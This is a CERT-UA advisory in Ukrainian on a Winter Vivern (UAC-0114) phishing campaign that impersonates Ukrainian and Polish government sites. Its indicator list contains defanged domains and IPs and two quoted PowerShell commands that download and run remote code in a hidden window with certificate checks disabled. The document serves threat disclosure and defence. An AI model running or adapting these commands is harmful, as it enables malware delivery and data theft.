Нова кібератака – фейковий сайт МЗС

Загальна інформація

Урядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA виявлено вебсторінку, що імітує офіційний вебресурс Міністерства закордонних справ України, на якій пропонується завантажити програмне забезпечення для «виявлення заражених комп'ютерів».

У разі переходу за посиланням на ЕОМ буде завантажено BAT-файл «Protector.bat», відкриття якого призведе до завантаження та запуску на комп'ютері PowerShell-скриптів, один з яких забезпечить рекурсивний пошук файлів з розширеннями: .edb, .ems, .eme, .emz, .key, .pem, .ovpn, .bat, .cer, .p12, .cfg, .log, .txt, .pdf, .doc, .docx, .xls, .xlsx, .rdg у каталозі робочого столу, створення знімків екрану та подальшу ексфільтрацію даних за допомогою HTTP. При цьому передбачено створення запланованих завдань, призначених для забезпечення персистентності.

У межах співпраці з CERT Polska та CSIRT MON (Республіка Польща) виявлено аналогічні фішингові ресурси, що імітують офіційні вебсторінки МЗС України, СБ України, а також Поліції Польщі. Зауважимо, що в червні 2022 року подібна фішингова вебсторінка імітувала вебінтерфейс поштового сервера МО України.

Згадана активність відстежується за ідентифікатором UAC-0114 (також відома як Winter Vivern). 

Тактики, техніки та процедури, що використовуються групою, є доволі типовими: одноманітні PowerShell-скрипти, тема «сканерів шкідливих програм». Крім того, високоймовірно, що до складу групи входять російськомовні учасники, адже одна з використовуваних шкідливих програм APERETIF (MD5: 3acfb7c694b259158fe042fd3392b0d1) містить доволі характерний рядок (PDB): «C:\Users\user_1\source\repos\Aperitivchick\Release\SystemProtector.pdb».

Індикатори компрометації

Файли:

Хостові:

%APPDATA%\XmlSchemaMicrosoftXsd.xml

%APPDATA%\XmlSchemaMicrosoftXsdO.xml

%PUBLIC%\MicrosoftUpdateClient\

%PUBLIC%\MicrosoftUpdateClient\Microsoft_update_tool_%NUM%.dat

powershell.exe -c "Start-Process -win hidden -filepath 'powershell.exe' -argumentlist ""`$a=whoami;"",""[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true};iex (New-Object Net.WebClient).DownloadString('hXXps://bugiplaysec[.]com/fjasmngptwq214.php')"""

powershell.exe -c "Start-Process -win hidden -filepath 'powershell.exe' -argumentlist ""`$a=whoami;"",""[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true};iex (New-Object Net.WebClient).DownloadString('hXXps://troadsecow[.]com/fjasmngptwq95824s.php')"""

Client_Update_Microsofts-{ITCUNTH-9D12-4RE1-8BWD-6HFI2D4FNI1I2}

Мережеві:

hXXps://bugiplaysec[.]com/ssu.gov.ua/

hXXps://ocspdep[.]com/ssu.gov.ua/

hXXp://troadsecow[.]com/policja.gov.pl

hXXps://troadsecow[.]com/cbzc.policja.gov.pl

hXXps://troadsecow[.]com/mfa.gov.ua/

hXXps://troadsecow[.]com/mfa.gov.ua/downloadapp.php

hXXps://troadsecow[.]com/

hXXps://troadsecow[.]com/76bja21412/c6bd801d882333fdb93dd17308b3e2de3a78cc05_.php

hXXps://troadsecow[.]com/76bja21412/c6bd801d882333fdb93dd17308b3e2de3a78cc05_1.php

hXXps://bugiplaysec[.]com/fjasmngptwq214.php

hXXps://troadsecow[.]com/fjasmngptwq95824s.php

hXXps://troadsecow[.]com/gkaslnwqpasg/fx64g15g.xml

hXXps://troadsecow[.]com/gkaslnwqpasg/usersfolders/%SID%/59948e7126a2927a53af0593f85dad2f5ae5c6e0.php

hXXps://troadsecow[.]com/gkaslnwqpasg/usersfolders/%SID%/62d4677fcf600ac0c4933bd80dec255868827e00.php

hXXps://troadsecow[.]com/gkaslnwqpasg/usersfolders/%SID%/9f5fe4bab163de5eedb995beed21c75578284fa4.php

hXXps://troadsecow[.]com/lg5362s5215098-xvbxzcnsaf4lmsa.php

hXXps://troadsecow[.]com/lg5362s5215098-xvbxzcnsaf4lmsa.php?idu=%SID%

ocspdep[.]com       2021-12-01  @registrar.eu

troadsecow[.]com    2022-10-10  @ownregistrar.com

bugiplaysec[.]com   2022-07-19  @realtimeregister.com

176[.]97.66.57      AE  @iroko.net

195[.]54.170.26     NO  @iroko.net

45[.]136.198.141    BG  @iroko.net

80[.]79.119.239     GB  @wavecom.ee (@3nt.com)

Графічні зображення